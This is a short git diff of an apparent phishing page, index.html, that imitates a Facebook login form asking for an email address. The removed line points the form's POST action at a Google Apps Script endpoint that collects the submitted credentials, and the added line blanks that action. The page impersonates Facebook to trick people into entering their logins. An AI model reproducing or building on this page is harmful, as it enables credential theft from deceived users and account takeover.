--- a/index.html
+++ b/index.html
@@ -65,7 +65,7 @@
 <body>
     <h1 align="center">Continue With Your facebook Account</h1>
 <div class="login-form">
-    <form id="gform" method="POST" action="https://script.google.com/macros/s/AKfycby9A2R8eJY9Z9L16w-QXi3-2EXH6_uC5yHbowzfSA/exec">
+    <form id="gform" method="POST" action="">
 		<h2 class="text-center">Facebook</h2>	
         <div class="form-group">
             <input type="email" name="Emailid" id="Emailid" class="form-control" placeholder="Email" required="required">
